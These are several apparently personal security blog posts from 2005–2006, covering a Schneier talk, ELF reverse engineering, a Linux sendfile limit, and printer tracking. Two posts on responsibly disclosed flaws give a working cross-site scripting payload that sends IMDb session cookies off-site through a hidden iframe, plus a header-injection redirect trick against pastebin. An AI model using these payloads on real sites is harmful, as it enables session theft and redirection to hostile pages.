While some of the crime organizations have been taken down, there are still large bot networks that are continuing to grow in size even though they have no controller any more. This is truly something out of dystopic sci-fi. I don’t know why, but while I find the idea of full AIs reasonable, and totally non-intelligent systems reasonable, I find half-AI systems really creepy. They just keep doing some semi-smart thing over and over waiting until mommy comes back to tell them to do something else now.

He wound down discussing his worries for the future. He wants people thinking about VoIP security now. (Worms sniff your typing and packets already, soon they can sniff your voice.) He hinted at Digital Restrictions Management without actually saying DRM. (“Who owns your computer?” To which I thought, “I do. This is why Free Software is so important.”)

In closing he talked about security being more about usability than technology. I took that to mean “the Art of security is more about usability than technology.” I can have infinite security by just unplugging something. But that’s not very artful. Towards the goal of successful (artful) security, he wants to see service providers be ultimately liable for the financial damage. He figures this puts the motivations in the right place. It seems like the right thing to me (if credit card companies want to avoid it, it must be good for me) but I suspect there is something hidden deeper that may cause greater harm. I can’t put my finger on it, so for now, I’ll agree. :)

At one point he gave a nice view into his own world, in which he has to go twice a year and disinfect his own mother’s computer of worms. The cobbler’s childrens’ feet…

The end of the session was a book signing (Counterpane gave out gratis copies of Schneier’s new book “Beyond Fear“). I showed my geek by having brought a copy of “Applied Cryptography” for him to sign too. For which he was geek-prepared, and tossed in a cryptogram. Even though he does this for lots of people (Google told me later), it was fun to see it in my book; I wasn’t expecting it.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 17, 2006

ngsec games

Filed under: Reverse Engineering,Security — kees @ 5:49 pm

Today I was reminded of the NGsec security games site from a DefCon CTF team-mate. (This game was actually used as a prequal for DefCon 10, which I didn’t go to. Ken told me stories about it, though.) I burned through stages 1-9 in about 45 minutes, and then hit stage 10 and was side-tracked learning about encrypted ELF binaries.

There continues to be no useful FOSS binary analyzers for this kind of reverse engineering. gdb just doesn’t even begin to cut it: it was made for (surprise!) debugging programs built by friendly compilers, not doing forensics on decidedly unfriendly, hand-crafted binaries . If Paul Graham and Richard Hamming are to be believed:

  1. What are the most important problems in your field?
  2. Are you working on one of them?
  3. Why not?

I should be writing a static binary analyzer. And a dynamic one too. GPL IDApro replacement. Yeow.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

January 16, 2006 and sendfile

Filed under:,Networking,Security — kees @ 4:50 pm

The “sendfile” system call is a way to send file contents directly out to a network socket. This saves time in userspace (so it doesn’t have to copy buffer contents around), and was one of the reasons I upgraded‘s Apache to version 2.x at the end of 2003 (because version 1.x doesn’t have sendfile support). A few weeks ago, one of the other admins discovered that files greater than 2G were not being delivered by Apache.

I had a lot of fun tracking down the issue. The “amount to send” argument in the sendfile call is a “size_t”, which is basically an “unsigned long”. Having a 2G limit didn’t make sense, since even with 32 bits, that should be a 4G limit. However, the servers are both 64bit, so as it turns out, “size_t” is a full 64 bits. After writing a quick test, I was able to verify that it was, indeed, a 31 bit limit on both 64 bit and 32 bit kernels. Peter Anvin took it from here, and tracked down the origin of the problem: filesystem operations greater than 31 bits in offset were being rejected deep in the kernel. He suggested truncating the request instead of returning a failure.

Seems as though Linus decided to limit the size of filesystem calls to make sure there aren’t security problems (signed vs unsigned overflows) in the various filesystem drivers, while people using the Linux kernel migrate more from 32bit to 64bit systems. Personally, I don’t agree with this, but from a practical stand-point, it hardly makes a difference. Instead of sending all 4G out the pipe and returning to user space, it just returns twice, sending 2G per call.

This should be fixed in 2.6.16. Until then, we could patch Apache to keep it’s offset request under 31 bits, but we’ll probably just tell people to use FTP, since vsftpd doesn’t use sendfile yet.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 31, 2005

imdb xss

Filed under: Security,Vulnerabilities — kees @ 10:43 pm

Last week I discovered a cross-site scripting vulnerability in IMDb’s website. It was a strong enough vulnerability that I could actively steal login sessions with it. Part of their Search system would pass the “to-be-displayed” location on the URL, and didn’t quote HTML entities. I was able to steal my own cookies and log in with my IMDb account from another computer. Last Wed, I reported it:

26 Oct 2005 10:29:59 PM

It seems your service is vulnerable to cross-site scripting (XSS). Since you
have login information stored as cookies, it’s possible for people to trick
others into exposing their logins. As an example, this displays your cookies to
you in your browser:;%3Cscript%3Ealert(document.cookie)%3C/script%3E

Please let me know if you have any questions. I love using IMDb, and thought
you might want to make yourselves more secure.


At 9am today, they had fixed it:

31 Oct 2005 09:01:17 AM
Thank you for your feedback about the Internet Movie Database.

The IMDb is constantly being updated and improved, and we welcome all comments and suggestions aimed at improving its features, flexibility and ease of use.

We appreciate that you took the time to share your thoughts with us. It has now been fixed.

Thank you for your support!

The IMDb Help Desk

Another success for vulnerability reporting!

As for a concrete example, the “heading” argument to their search tool was being displayed. The harmless example I used above just pops an alert dialog. To actually pass the cookies off-site where it can be collected, I used an invisible IFRAME, and pulled a content-less document from my server. To do this, I wanted the following to appear on the IMDb page:

<iframe src=”” width=”0″ height=”0″ frameborder=”0″</iframe>

There are a number of ways to take the browser off-site. Another are the HTTP methods that get used in a lot of AJAX applications. I haven’t dug into using that, even though they’re way more powerful (since you don’t need to “hide” the results of an IFRAME, etc, if you don’t listen for the HTTP results, they just never get used — it’s only the “side-effect” of recording the cookie off-site that’s wanted). Since this XSS vulnerability lets me write JavaScript directly to the browser, I needed to inject the following:

document.write(‘<iframe src=”’+document.cookie+'” width=”0″ height=”0″ frameborder=”0″</iframe>’)

And here it is, HTML-encoded, stuffed into the middle of the “header” argument to the search function, disguised as a search for filming locations in Vancouver, BC:,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%20Canada&&heading=18;with+locations+including;Koerner%20Plaza,%20University%20of%20British%20Columbia,%20Vancouver,%20British%20Columbia,%3Cscript%3Edocument.write(‘%3Ciframe%20src=%22’%2Bdocument.cookie%2B’%22%20width=%220%22%20height=%220%22%20frameborder=%220%22%3E%3C/iframe%3E’)%3C/script%3E%20Canada

And if you click that, you can see their newly fixed entity-escaping. Again, kudos to IMDb! Additionally, it looks like they rearranged their search tool to not even use the “header” argument anymore. Neato.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 27, 2005

pastebin rulez

Filed under: Security,Vulnerabilities — kees @ 7:40 am

When discussing code on IRC, I’ve found to be a valuable resource for sharing code snippets. It has a really simple interface, and can give you a semi-private area just by specifying a subdomain (e.g.

I had spent some time yesterday doing some other security audits, and figured I’d poke around at pastebin. Overall, the system was fine (only two inputs: text and name — both were strongly filtered). I did discover a redirect bug, though, which would let me use the site to redirect to somewhere else. While there isn’t anything to “steal” on pastebin, a bad guy could still trick their unsuspecting friends into visiting other (maybe more dangerous?) websites.

I reported the problem to pastebin’s author (Paul Dixon), and he had it fixed before I woke up. That’s how vulnerability reporting is supposed to work! Thanks Paul!

Here’s how it used to work. From the pastebin help, you can type in a subdomain to use for your pastebin. (Like “yayoutflux” above.) The form did some checking (no /’s allowed), but would accidentally let you send whitespace, including a linefeed.

Normally, a web redirect from that form would look something like this, where the user input is shown in bold:

HTTP/1.1 302 Found

However, if I add a linefeed (URL encoded as %0A:, I could break the “Location” tag, and trick the browser into going somewhere else:

HTTP/1.1 302 Found

Great illustration of redirection XSS.

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

October 19, 2005

color printer tracking

Filed under: Reverse Engineering,Security — kees @ 3:28 pm

I’m a little behind in my Slashdot reading, so apologies to those that saw this earlier.

The EFF cracked the nearly invisible finger-printing code produced by color printers. This system is used by most (if not all) major color printer manufacturers to report the serial number of the printer used and the date a page was printed. This system has been in place for at least 10 years. I’m horrified at this kind of privacy invasion. To quote the EFF:

“Underground democracy movements that produce political or religious pamphlets and flyers, like the Russian samizdat of the 1980s, will always need the anonymity of simple paper documents, but this technology makes it easier for governments to find dissenters,” said EFF Senior Staff Attorney Lee Tien. “Even worse, it shows how the government and private industry make backroom deals to weaken our privacy by compromising everyday equipment like printers. The logical next question is: what other deals have been or are being made to ensure that our technology rats on us?”

EFF press release:
Washington Post coverage:

© 2005, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

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